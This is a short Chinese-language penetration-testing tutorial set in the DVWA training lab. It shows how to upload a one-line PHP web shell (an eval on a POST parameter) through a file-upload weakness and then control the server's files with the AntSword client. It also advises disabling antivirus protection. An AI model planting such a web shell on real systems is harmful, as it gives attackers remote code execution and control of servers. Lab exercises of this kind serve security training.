【渗透测试】|文件上传
1、安装使用蚁剑
https://blog.csdn.net/weixin_42474304/article/details/116376746
1、登陆dvwa,进入初级文件上传,上传一句话木马文件cmd.php,
//cmd.php
<?php eval($_POST['ccit']); ?>
//eval: 执行命令的函数
//ccit:一句话木马文件的参数
文件上传成功,根据提示的上传路径得到完整url路径http://192.xx.xx.xx/dvwa/hackable/uploads/cmd.php
2、打开中国蚁剑
页面空白处右键-添加数据,如图
进入下列页面,填写url和连接密码,其他选择默认
url为:http://192.xx.xx.xx/dvwa/hackable/uploads/cmd.php
连接密码为:一句话木马文件中引号里的内容-ccit
填写完成后,点击测试连接,若显示成功,连接成功时,此时可以将该数据进行添加
完成后,中国蚁剑的主页面出现一条记录,双击该记录,即可打开文件管理界面,如图
即:上传一句话木马文件后,蚁剑连接服务器,管理服务器文件件系统等,成功实现了文件上传攻击
特别注意: 渗透测试过程中,注意关闭”病毒和威胁防护“或回复被隔离的文件